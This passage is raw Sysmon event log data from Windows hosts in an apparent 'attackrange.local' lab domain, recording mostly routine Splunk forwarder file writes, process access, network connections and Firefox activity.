07:59:54.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.365{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F67A-60EB-9F7D-00000000CF01}5260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.328{466BC892-F67A-60EB-9F7D-00000000CF01}5260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001051966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:45.584{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51138-false10.0.1.12-8000- 23542300x8000000000000000808952Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:55.729{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28D5D719DE231FB48986C9BE39142E2A,SHA256=C7E23359E96B7C1629649C3A4A359760263648A9AA07B00318C4C5C2E747DB83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:55.536{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=390A72C32D97AB72FD4EA00426CAC918,SHA256=FB6DBC7814ADF3D5227037DD34CE0ACE1F8CB8D8E51A7F170CCF68BBA7267807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808951Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:55.198{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2F0DE248AB634C0E3816254076BD28E3,SHA256=1E04915CF7A297560B239861BDA3B1FF8B8EF54BD2ECC51981D742F7FA61803A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808950Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:55.198{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFF8F08C52B80FBD0952FD8B56D1696B,SHA256=D18452EB615E01D1A1A837E747A50D485BA2D2CB8C19AB836B44497A91BFBD08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:55.335{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=825F8FCA44B8CC3B7DCC22F4E213EB6A,SHA256=30F498C7AA5173591684E8BC826334A4890253F2ADD503697C8DC7F2B0972160,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808954Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:56.731{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37CCB20D9B28A1D8D660E2CE602E4DFB,SHA256=9FC17C1252A8B59A9186C25C8108F710EE84DD43CF3FFECE2A937CC37BE3495F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:56.550{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5658A55A08D29ED7405BF2604EDAD120,SHA256=87871B9D3F73744667A3C42712D0D5D63A7DEE35B9571232CE357B542F7D1E8F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808953Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:54.340{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57363-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x80000000000000001051978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:47.725{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57363-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x8000000000000000808955Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:57.746{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C87C98B614A9053557DA5B85B359CD99,SHA256=C42C9BF75D088BDB814387CF5FFED729BE2D20BBEC82EB3F2E251148D017A778,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:57.581{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9836B041FC12303B13831D7231C36C9,SHA256=DBC1CBCE23C3312242DF8CED5383C3191ADB6D8C436AA170D20DAA9A4F5D566F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:57.181{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808956Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:58.762{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EF20955A3E0EA7EC20FD0ACFCC5C539,SHA256=11D0AC644AB8EF7CA06F16449DE3D1E3EE4440B43C71B74D9678C7779616B03F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:58.581{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E728FB19D4CA1323F72E11EF15D6C75,SHA256=E170D07B4DB8BE94AF0E525F298CA44F900224DFFE047CE5C3FAF0A8BF3D4B2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808957Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:59.793{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5DE8B897249675CDE0753AA91FADC0D,SHA256=A4A0E86AB32411977EA1FA71BA59116491094752C109FE4F4F53FBA149BAFBB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:59.582{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D06B6A33CB544398BDA9885CF5CDB479,SHA256=BF86D6CF2A53A43D6708A56CE4F654AB0612E855BE21056F3FF60C4F7F64BD12,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.716{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51140-false10.0.1.12-8000- 354300x80000000000000001051983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:50.701{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51139-false10.0.1.12-8089- 23542300x8000000000000000808959Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:00.793{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9769F824D92A8D9A96D77CA4FBC1B468,SHA256=77DB7B6E2D9C7021BBA4F7AC101C23040D556CAA63B53BDF49958A45FF0F3307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:00.800{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\datareporting\aborted-session-pingMD5=A819E972D627AB2D7B1E8DEA0BDE7322,SHA256=8C0596E29A345A87A4C3786A3F0D04CF6ED8339A7476E37348ED2D001D489F07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:00.583{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBF474A1603EEC42AE865DE84CE7863D,SHA256=2542AEAE2620FDB9C0A9F03233C96C54790FADEA4C56C72937A1A5C96305E475,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808958Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:58.316{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57364-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808960Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:01.809{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29424AD4E01E585297608DE110B13535,SHA256=343962CF7F14886A7523746841E0D59BA1B871FF624F7324151AC0A3D5601EFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:01.590{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0724D6DD272144C404080ABF219EDC3,SHA256=DAA62D9A434FEDE3B169F565EB258794124C1EEB2726AF6F44811CFECFFBD76A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.914{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-59604-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001051989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:01.052{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D785BE59207A68343C99C24550667EF,SHA256=A99372636DCF85E0F387EA27F09CE8D2D132CBD95CE30E95608DB98E737AA93F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:01.052{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=038625DBCE66D718A4E0893366DA3617,SHA256=6CC086BC049D6EF1479EC3ACDE22684F2458C519B69B7A4D923E2F51E87974A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808961Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:02.840{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F69ADEB1F399A916213D07D70A7D30C1,SHA256=0F4DC384F96BB77397B38FD10C87B49FA8924AC09B0167C71604339C8679A694,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:02.607{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00BE509FCF615183A0BB83A1EC7C38BD,SHA256=E012DD4FEB4FB1E8C021DA1A67740EE8C41D73EE02292B0EF613B7976685BC03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808962Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:03.856{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F277850754E5B46D3F1FF92E22031E39,SHA256=8F66F868AD92716BF6B62F4724825C96F0B490463F91388FFC48589A3AB1FB42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:03.626{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5AB3F175D90248E87A1EFC3571983A3,SHA256=5D842DE9B45BE5A488051D53C84B8AFE0ACDA16D481047D1DF6D46F07526A92F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808963Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:04.887{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF0B3A4E5ED4A753C9BEF8442A172467,SHA256=341504E99EEE720384FA928D3FE3B928412A9976F8704E649D5988BA51B5BD73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:04.656{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73CF7815064DFD28569A6FF78AA94B32,SHA256=C8FF80703DCA964C18C4D911DA45501FD1CB263E2DCD319CD791331A197CF1C0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:56.624{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51141-false10.0.1.12-8000- 23542300x8000000000000000808965Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:05.918{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41D379D6CB80CA65672B9D404DEB49EA,SHA256=81AF90B1B9A437CC1FF2A46870E0E128A306CD155B44897266CB86C943D87869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:05.671{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00B83E6F2D2F72C6B7773FB94AFA4FC0,SHA256=88AE25C1C13CB0DDFE9450D7723EBDE603DC0DE62259254ECE061E65384EF50B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808964Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:04.332{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57365-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808966Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:06.949{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0820F0076FF4DDD7E6919BF6F183C77,SHA256=A62F6BCA09FC17F18AE47C5036E40E10A1993E88DFA15BC6A75822742B736450,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:06.686{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D52F1D86758654F8FBFC8ED802C04BC,SHA256=7ACF6587B6E43A79D50D41B6F14DBE4B2A5255E2A9E72946EC6CC6F1A2DA5926,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:06.440{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:06.324{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001051999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:06.324{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla 